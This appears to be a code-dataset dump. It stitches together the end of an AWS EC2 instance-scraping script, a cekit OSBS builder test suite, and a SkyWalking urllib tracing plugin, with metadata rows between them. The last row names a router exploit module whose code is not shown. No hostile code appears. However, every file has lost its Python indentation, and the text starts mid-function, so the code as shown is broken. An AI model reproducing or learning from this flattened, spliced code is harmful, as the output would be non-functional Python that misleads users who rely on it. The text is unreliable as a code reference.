needs_initialization,
trim_support) = tuple(totext(i) for i in columns)
if instance_type is None:
continue
for i in instances:
if i.instance_type == instance_type:
i.ebs_only = True
m = re.search(r'(\d+)\s*x\s*([0-9,]+)?', storage_volumes)
if m:
i.ebs_only = False
i.num_drives = locale.atoi(m.group(1))
i.drive_size = locale.atoi(m.group(2))
i.ssd = 'SSD' in storage_type
i.nvme_ssd = 'NVMe' in storage_type
i.trim_support = checkmark_char in trim_support
i.storage_needs_initialization = checkmark_char in needs_initialization
i.includes_swap_partition = dagger_char in storage_volumes
def add_t2_credits(instances):
# Canonical URL for this info is
# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/t2-credits-baseline-concepts.html
# url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/burstable-credits-baseline-concepts.partial.html"
# It seems it's no longer dynamically loaded
url = "http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/t2-credits-baseline-concepts.html"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]//table')[0]
rows = table.xpath('.//tr[./td]')
assert len(rows) > 0, "Failed to find T2 CPU credit info"
by_type = {i.instance_type: i for i in instances}
for r in rows:
if len(r) > 1:
inst_type = totext(r[0])
if not inst_type in by_type:
print(f"WARNING: skipping unknown instance type '{inst_type}' in CPU credit info table")
continue
inst = by_type[inst_type]
creds_per_hour = locale.atof(totext(r[1]))
inst.base_performance = creds_per_hour / 60
inst.burst_minutes = creds_per_hour * 24 / inst.vCPU
def add_pretty_names(instances):
family_names = {
'c1': 'C1 High-CPU',
'c3': 'C3 High-CPU',
'c4': 'C4 High-CPU',
'c5': 'C5 High-CPU',
'c5d': 'C5 High-CPU',
'cc2': 'Cluster Compute',
'cg1': 'Cluster GPU',
'cr1': 'High Memory Cluster',
'g4': 'G4 Accelerated Computing',
'hi1': 'HI1. High I/O',
'hs1': 'High Storage',
'i3': 'I3 High I/O',
'm1': 'M1 General Purpose',
'm2': 'M2 High Memory',
'm3': 'M3 General Purpose',
'm4': 'M4 General Purpose',
'm5': 'M5 General Purpose',
'm5d': 'M5 General Purpose',
'g3': 'G3 Graphics GPU',
'g4': 'G4 Graphics and Machine Learning GPU',
'p2': 'P2 General Purpose GPU',
'p3': 'P3 High Performance GPU',
'p4d': 'P4D Highest Performance GPU',
'r3': 'R3 High-Memory',
'r4': 'R4 High-Memory',
'x1': 'X1 Extra High-Memory'
}
for i in instances:
pieces = i.instance_type.split('.')
family = pieces[0]
short = pieces[1]
prefix = family_names.get(family, family.upper())
extra = None
if short.startswith('8x'):
extra = 'Eight'
elif short.startswith('4x'):
extra = 'Quadruple'
elif short.startswith('2x'):
extra = 'Double'
elif short.startswith('10x'):
extra = 'Deca'
elif short.startswith('x'):
extra = ''
bits = [prefix]
if extra is not None:
bits.extend([extra, 'Extra'])
short = 'Large'
bits.append(short.capitalize())
i.pretty_name = ' '.join([b for b in bits if b])
def add_emr_info(instances):
url = "https://a0.awsstatic.com/pricing/1/emr/pricing-emr.min.js"
pricing = fetch_data(url)
def extract_prices(data):
ret = {}
for x in data["regions"]:
for inst in x["instanceTypes"]:
for size in inst["sizes"]:
if size["size"] not in ret:
ret[size["size"]] = {}
ret[size["size"]][x["region"]] = {
size["valueColumns"][0]["name"]:
size["valueColumns"][0]["prices"]["USD"],
size["valueColumns"][1]["name"]:
size["valueColumns"][1]["prices"]["USD"],
"currencies": data["currencies"],
"rate": data["rate"],
}
return ret
pricing = extract_prices(pricing["config"])
for inst in instances:
if inst.instance_type in pricing:
inst.emr = True
for region in inst.pricing:
if region in pricing[inst.instance_type]:
inst.pricing[region]["emr"] = pricing[
inst.instance_type][region]
def add_gpu_info(instances):
"""
Add info about GPUs from the manually-curated dictionaries below. They are
manually curated because GPU models and their corresponding CUDA Compute
Capability are not listed in a structured form anywhere in the AWS docs.
This function will print a warning if it encounters an instance with
.GPU > 0 for which GPU information is not included in the dictionaries
below. This may indicate that AWS has added a new GPU instance type. If you
see such a warning and want to fill in the missing information, check
https://aws.amazon.com/ec2/instance-types/#Accelerated_Computing for
descriptions of the instance types and https://en.wikipedia.org/wiki/CUDA
for information on the CUDA compute capability of different Nvidia GPU
models.
"""
gpu_data = {
'g2.2xlarge': {
# No longer listed in AWS docs linked above. Alternative source is
# https://medium.com/@manku_timma1/part-1-g2-2xlarge-gpu-basics-805ad40a37a4
# The model has 2 units, 4G of memory each, but AWS exposes only 1 unit per instance
'gpu_model': 'NVIDIA GRID K520',
'compute_capability': 3.0,
'gpu_count': 1,
'cuda_cores': 3072,
'gpu_memory': 4
},
'g2.8xlarge': {
# No longer listed in AWS docs linked above. Alternative source is
# https://aws.amazon.com/blogs/aws/new-g2-instance-type-with-4x-more-gpu-power/
'gpu_model': 'NVIDIA GRID K520',
'compute_capability': 3.0,
'gpu_count': 4,
'cuda_cores': 6144,
'gpu_memory': 16
},
'g3s.xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 1,
'cuda_cores': 2048,
'gpu_memory': 8
},
'g3.4xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 1,
'cuda_cores': 2048,
'gpu_memory': 8
},
'g3.8xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 2,
'cuda_cores': 4096,
'gpu_memory': 16
},
'g3.16xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 4,
'cuda_cores': 8192,
'gpu_memory': 32
},
'g4dn.xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.2xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.4xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.8xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.16xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.12xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 4,
'cuda_cores': 10240,
'gpu_memory': 64
},
'g4dn.metal': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 8,
'cuda_cores': 20480,
'gpu_memory': 128
},
'p2.xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 1,
'cuda_cores': 2496,
'gpu_memory': 12
},
'p2.8xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 4,
'cuda_cores': 19968,
'gpu_memory': 96
},
'p2.16xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 8,
'cuda_cores': 39936,
'gpu_memory': 192
},
'p3.2xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 1,
'cuda_cores': 5120,
'gpu_memory': 16
},
'p3.8xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 4,
'cuda_cores': 20480,
'gpu_memory': 64
},
'p3.16xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 8,
'cuda_cores': 40960,
'gpu_memory': 128
},
'p3dn.24xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 8,
'cuda_cores': 40960,
'gpu_memory': 256
},
'p4d.24xlarge': {
'gpu_model': 'NVIDIA A100',
'compute_capability': 8.0,
'gpu_count': 8,
'cuda_cores': 55296, # Source: Asked Matthew Wilson at AWS as this isn't public anywhere.
'gpu_memory': 320
},
}
for inst in instances:
if inst.GPU == 0:
continue
if inst.instance_type not in gpu_data:
print(f"WARNING: instance {inst.instance_type} has GPUs but is missing from gpu_data "
"dict in scrape.add_gpu_info. The dict needs to be updated manually.")
continue
inst_gpu_data = gpu_data[inst.instance_type]
inst.GPU_model = inst_gpu_data['gpu_model']
inst.compute_capability = inst_gpu_data['compute_capability']
inst.GPU_memory = inst_gpu_data['gpu_memory']
def add_availability_zone_info(instances):
"""
Add info about availability zones using information from the following APIs:
- aws ec2 describe-instance-type-offerings --region us-east-1
- aws ec2 describe-instance-type-offerings --location-type availability-zone --region us-east-1
- aws ec2 describe-availability-zones --region us-east-1
https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-instance-type-offerings.html
"""
instance_type_region_availability_zones = {}
for region_name in ec2.describe_regions():
for offering in ec2.describe_instance_type_offerings(region_name=region_name, location_type='availability-zone-id'):
instance_type = offering['InstanceType']
availability_zone_id = offering['Location']
region_availability_zones = instance_type_region_availability_zones.get(instance_type, {})
availability_zones = region_availability_zones.get(region_name, [])
if availability_zone_id not in availability_zones:
availability_zones.append(availability_zone_id)
availability_zones.sort()
region_availability_zones[region_name] = availability_zones
instance_type_region_availability_zones[instance_type] = region_availability_zones
for inst in instances:
inst.availability_zones = instance_type_region_availability_zones.get(inst.instance_type, {})
def scrape(data_file):
"""Scrape AWS to get instance data"""
print("Parsing instance types...")
all_instances = ec2.get_instances()
print("Parsing pricing info...")
add_pricing_info(all_instances)
print("Parsing ENI info...")
add_eni_info(all_instances)
print("Parsing EBS info...")
add_ebs_info(all_instances)
print("Parsing Linux AMI info...")
add_linux_ami_info(all_instances)
print("Parsing VPC-only info...")
add_vpconly_detail(all_instances)
print("Parsing local instance storage...")
add_instance_storage_details(all_instances)
print("Parsing burstable instance credits...")
add_t2_credits(all_instances)
print("Parsing instance names...")
add_pretty_names(all_instances)
print("Parsing emr details...")
add_emr_info(all_instances)
print("Adding GPU details...")
add_gpu_info(all_instances)
print("Adding availability zone details...")
add_availability_zone_info(all_instances)
with open(data_file, 'w') as f:
json.dump([i.to_dict() for i in all_instances],
f,
indent=2,
sort_keys=True,
separators=(',', ': '))
if __name__ == '__main__':
scrape('www/instances.json')
| 38.960052
| 124
| 0.588562
|
09a181fbbe5b1f14e40f67c6b223e8eb7fd104df
| 19,049
|
py
|
Python
|
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
# pylint: disable=protected-access
import logging
import os
import shutil
import subprocess
import yaml
import pytest
from click.testing import CliRunner
from cekit.cli import Cekit, Map, cli
from cekit.tools import Chdir
from cekit.config import Config
from cekit.errors import CekitError
from cekit.builders.osbs import OSBSBuilder
from cekit.tools import Map
config = Config()
@pytest.fixture(autouse=True)
def reset_config():
config.cfg['common'] = {}
config = Config()
config.cfg['common'] = {'redhat': True}
image_descriptor = {
'schema_version': 1,
'from': 'centos:latest',
'name': 'test/image',
'version': '1.0',
'labels': [{'name': 'foo', 'value': 'bar'}, {'name': 'labela', 'value': 'a'}],
'osbs': {
'repository': {
'name': 'repo',
'branch': 'branch'
}
}
}
def run_cekit(cwd,
parameters=['build', '--dry-run', 'docker'],
message=None, return_code=0):
with Chdir(cwd):
result = CliRunner().invoke(cli, parameters, catch_exceptions=False)
assert result.exit_code == return_code
if message:
assert message in result.output
return result
def run_osbs(descriptor, image_dir, mocker, return_code=0, build_command=None):
if build_command is None:
build_command = ['build', 'osbs']
# We are mocking it, so do not require it at test time
mocker.patch('cekit.builders.osbs.OSBSBuilder.dependencies', return_value={})
mocker.patch('cekit.builders.osbs.OSBSBuilder._wait_for_osbs_task')
mocker.patch('cekit.builders.osbs.DistGit.prepare')
mocker_check_output = mocker.patch.object(subprocess, 'check_output', side_effect=[
b"true", # git rev-parse --is-inside-work-tree
b"/home/repos/path", # git rev-parse --show-toplevel
b"branch", # git rev-parse --abbrev-ref HEAD
b"3b9283cb26b35511517ff5c0c3e11f490cba8feb", # git rev-parse HEAD
b"", # git ls-files .
b"", # git ls-files --others --exclude-standard
b"", # git diff-files --name-only
b"ssh://someuser@somehost.com/containers/somerepo", # git config --get remote.origin.url
b"3b9283cb26b35511517ff5c0c3e11f490cba8feb", # git rev-parse HEAD
b"1234", # brew call --python...
b"UUU"
])
with open(os.path.join(image_dir, 'config'), 'w') as fd:
fd.write("[common]\n")
fd.write("redhat = True")
with open(os.path.join(image_dir, 'image.yaml'), 'w') as fd:
yaml.dump(descriptor, fd, default_flow_style=False)
return run_cekit(image_dir, ['-v',
'--work-dir', image_dir,
'--config', 'config'] + build_command,
return_code=return_code)
def test_osbs_builder_with_asume_yes(tmpdir, mocker, caplog):
caplog.set_level(logging.DEBUG, logger="cekit")
# Specifically set the decision result to False, to fail any build
# that depends on the decision. But in case the --assume-yes switch is used
# we should not get to this point at all. If we get, the test should fail.
mock_decision = mocker.patch('cekit.tools.decision', return_value=False)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
mocker.patch.object(subprocess, 'call', return_value=1)
source_dir = tmpdir.mkdir('source')
source_dir.mkdir('osbs').mkdir('repo')
run_osbs(image_descriptor.copy(), str(source_dir), mocker, 0, ['build', 'osbs', '--assume-yes'])
mock_decision.assert_not_called()
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
def test_osbs_builder_with_push_with_sync_only(tmpdir, mocker, caplog):
"""
Should sync with dist-git repository without kicking the build
"""
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=1)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker, 0, ['build', 'osbs', '--sync-only'])
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "The --sync-only parameter was specified, build will not be executed, exiting" in caplog.text
def test_osbs_builder_kick_build_without_push(tmpdir, mocker, caplog):
"""
Does not push sources to dist-git. This is the case when the
generated files are the same as already existing in dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=0)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
])
assert "No changes made to the code, committing skipped" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
def test_osbs_builder_kick_build_with_push(tmpdir, mocker, caplog):
"""
Does not push sources to dist-git. This is the case when the
generated files are the same as already existing in dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=1)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
# https://github.com/cekit/cekit/issues/504
def test_osbs_builder_add_help_file(tmpdir, mocker, caplog):
"""
Checks if help.md file is generated and added to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
descriptor['help'] = {'add': True}
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('help.md'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'help.md']),
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
# https://github.com/cekit/cekit/issues/394
def test_osbs_builder_add_extra_files(tmpdir, mocker, caplog):
"""
Checks if content of the 'osbs_extra' directory content is copied to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
dist_dir = source_dir.mkdir('osbs_extra')
dist_dir.join('file_a').write_text(u'Some content', 'utf8')
dist_dir.join('file_b').write_text(u'Some content', 'utf8')
dist_dir.mkdir('child').join('other').write_text(u'Some content', 'utf8')
os.symlink('/etc', str(dist_dir.join('a_symlink')))
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
run_osbs(image_descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('file_a'))) is True
assert os.path.exists(str(repo_dir.join('file_b'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'file_b']),
mocker.call(['git', 'add', '--all', 'file_a']),
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'child']),
mocker.call(['git', 'add', '--all', 'a_symlink'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
assert "Copying files to dist-git '{}' directory".format(str(repo_dir)) in caplog.text
assert "Copying 'target/image/file_b' to '{}'...".format(
os.path.join(str(repo_dir), 'file_b')) in caplog.text
assert "Staging 'file_a'..." in caplog.text
assert "Staging 'a_symlink'..." in caplog.text
# https://github.com/cekit/cekit/issues/394
def test_osbs_builder_add_extra_files_from_custom_dir(tmpdir, mocker, caplog):
"""
Checks if content of the custom specified 'dist' directory content is copied to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
dist_dir = source_dir.mkdir('dist')
dist_dir.join('file_a').write_text(u'Some content', 'utf8')
dist_dir.join('file_b').write_text(u'Some content', 'utf8')
dist_dir.mkdir('child').join('other').write_text(u'Some content', 'utf8')
os.symlink('/etc', str(dist_dir.join('a_symlink')))
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
descriptor['osbs']['extra_dir'] = 'dist'
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('file_a'))) is True
assert os.path.exists(str(repo_dir.join('file_b'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'file_b']),
mocker.call(['git', 'add', '--all', 'file_a']),
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'child']),
mocker.call(['git', 'add', '--all', 'a_symlink'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
assert "Copying files to dist-git '{}' directory".format(str(repo_dir)) in caplog.text
assert "Copying 'target/image/file_b' to '{}'...".format(
os.path.join(str(repo_dir), 'file_b')) in caplog.text
assert "Staging 'file_a'..." in caplog.text
assert "Staging 'a_symlink'..." in caplog.text
# https://github.com/cekit/cekit/issues/542
def test_osbs_builder_extra_default(tmpdir, mocker, caplog):
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
mocker.patch.object(subprocess, 'call', return_value=0)
mocker.patch.object(subprocess, 'check_call')
shutil.copytree(
os.path.join(os.path.dirname(__file__), 'modules'),
os.path.join(str(source_dir), 'tests', 'modules')
)
descriptor = image_descriptor.copy()
del descriptor['osbs']
run_osbs(descriptor, str(source_dir), mocker, return_code=1)
with open(os.path.join(str(source_dir), 'target', 'image.yaml'), 'r') as _file:
effective = yaml.safe_load(_file)
assert effective['osbs'] is not None
assert effective['osbs']['extra_dir'] == 'osbs_extra'
def test_osbs_builder_add_files_to_dist_git_without_dotgit_directory(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call')
mock_check_call = mocker.patch.object(subprocess, 'check_call')
res = mocker.Mock()
res.getcode.return_value = 200
res.read.side_effect = [b'test', None]
mocker.patch('cekit.descriptor.resource.urlopen', return_value=res)
repo_dir = tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
descriptor['artifacts'] = [{'url': 'https://foo/bar.jar'}]
run_osbs(descriptor, str(tmpdir), mocker)
calls = [
mocker.call(['git', 'push', '-q', 'origin', 'branch']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'add', '--all', 'Dockerfile'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Skipping '.git' directory" in caplog.text
def test_osbs_builder_with_koji_target_based_on_branch(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch.object(subprocess, 'call')
mocker.patch.object(subprocess, 'check_call')
tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(tmpdir), mocker)
assert "About to execute '/usr/bin/brew call --python buildContainer --kwargs {'src': 'git://somehost.com/containers/somerepo#3b9283cb26b35511517ff5c0c3e11f490cba8feb', 'target': 'branch-containers-candidate', 'opts': {'scratch': True, 'git_branch': 'branch', 'yum_repourls': []}}'." in caplog.text
def test_osbs_builder_with_koji_target_in_descriptor(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch.object(subprocess, 'call')
mocker.patch.object(subprocess, 'check_call')
tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
descriptor['osbs']['koji_target'] = 'some-target'
run_osbs(descriptor, str(tmpdir), mocker)
assert "About to execute '/usr/bin/brew call --python buildContainer --kwargs {'src': 'git://somehost.com/containers/somerepo#3b9283cb26b35511517ff5c0c3e11f490cba8feb', 'target': 'some-target', 'opts': {'scratch': True, 'git_branch': 'branch', 'yum_repourls': []}}'." in caplog.text
def test_osbs_builder_with_fetch_artifacts_file_creation(tmpdir, mocker, caplog):
"""
Checks whether the fetch-artifacts-url.yaml file is generatored.
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch('cekit.generator.osbs.get_brew_url', return_value='http://random.url/path')
mocker.patch.object(subprocess, 'check_output')
mocker.patch('cekit.builders.osbs.DistGit.push')
tmpdir.mkdir('osbs').mkdir('repo')
tmpdir.join('osbs').join('repo').join(
'fetch-artifacts-url.yaml').write_text(u'Some content', 'utf8')
with Chdir(os.path.join(str(tmpdir), 'osbs', 'repo')):
subprocess.call(["git", "init"])
subprocess.call(["git", "add", "fetch-artifacts-url.yaml"])
subprocess.call(["git", "commit", "-m", "Dummy"])
descriptor = image_descriptor.copy()
descriptor['artifacts'] = [
{'name': 'artifact_name', 'md5': '123456'}
]
run_osbs(descriptor, str(tmpdir), mocker)
with open(os.path.join(str(tmpdir), 'target', 'image', 'fetch-artifacts-url.yaml'), 'r') as _file:
fetch_artifacts = yaml.safe_load(_file)
assert len(fetch_artifacts) == 1
assert fetch_artifacts[0] == {'md5': '123456',
'target': 'artifact_name', 'url': 'http://random.url/path'}
assert "Artifact 'artifact_name' added to fetch-artifacts-url.yaml" in caplog.text
def test_osbs_builder_with_fetch_artifacts_file_removal(tmpdir, mocker, caplog):
"""
Checks whether the fetch-artifacts-url.yaml file is removed if exists
and is not used anymore.
https://github.com/cekit/cekit/issues/629
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch('cekit.generator.osbs.get_brew_url', return_value='http://random.url/path')
mocker.patch.object(subprocess, 'check_output')
mocker.patch('cekit.builders.osbs.DistGit.push')
tmpdir.mkdir('osbs').mkdir('repo')
tmpdir.join('osbs').join('repo').join(
'fetch-artifacts-url.yaml').write_text(u'Some content', 'utf8')
with Chdir(os.path.join(str(tmpdir), 'osbs', 'repo')):
subprocess.call(["git", "init"])
subprocess.call(["git", "add", "fetch-artifacts-url.yaml"])
subprocess.call(["git", "commit", "-m", "Dummy"])
run_osbs(image_descriptor, str(tmpdir), mocker)
assert not os.path.exists(os.path.join(str(tmpdir), 'osbs', 'repo', 'fetch-artifacts-url.yaml'))
assert "Removing old 'fetch-artifacts-url.yaml' file" in caplog.text
| 36.353053
| 302
| 0.665914
|
66d138ec3e9d5275e449721b358aeb13b90600e2
| 2,398
|
py
|
Python
|
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from urllib.request import Request
from skywalking import Layer, Component
from skywalking.trace import tags
from skywalking.trace.context import get_context
from skywalking.trace.tags import Tag
def install():
import socket
from urllib.request import OpenerDirector
from urllib.error import HTTPError
_open = OpenerDirector.open
def _sw_open(this: OpenerDirector, fullurl, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
if isinstance(fullurl, str):
fullurl = Request(fullurl, data)
context = get_context()
url = fullurl.selector.split("?")[0] if fullurl.selector else '/'
with context.new_exit_span(op=url, peer=fullurl.host) as span:
carrier = span.inject()
span.layer = Layer.Http
span.component = Component.General
code = None
[fullurl.add_header(item.key, item.val) for item in carrier]
try:
res = _open(this, fullurl, data, timeout)
code = res.code
except HTTPError as e:
code = e.code
raise
finally: # we do this here because it may change in _open()
span.tag(Tag(key=tags.HttpMethod, val=fullurl.get_method()))
span.tag(Tag(key=tags.HttpUrl, val=fullurl.full_url))
if code is not None:
span.tag(Tag(key=tags.HttpStatus, val=code, overridable=True))
if code >= 400:
span.error_occurred = True
return res
OpenerDirector.open = _sw_open
| 36.333333
| 99
| 0.660967
|
9046434d7ada39a6d93b568301729cc00d1397ee
| 3,264
|
py
|
Python
|
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | 2
|
2020-02-06T20:24:31.000Z
|
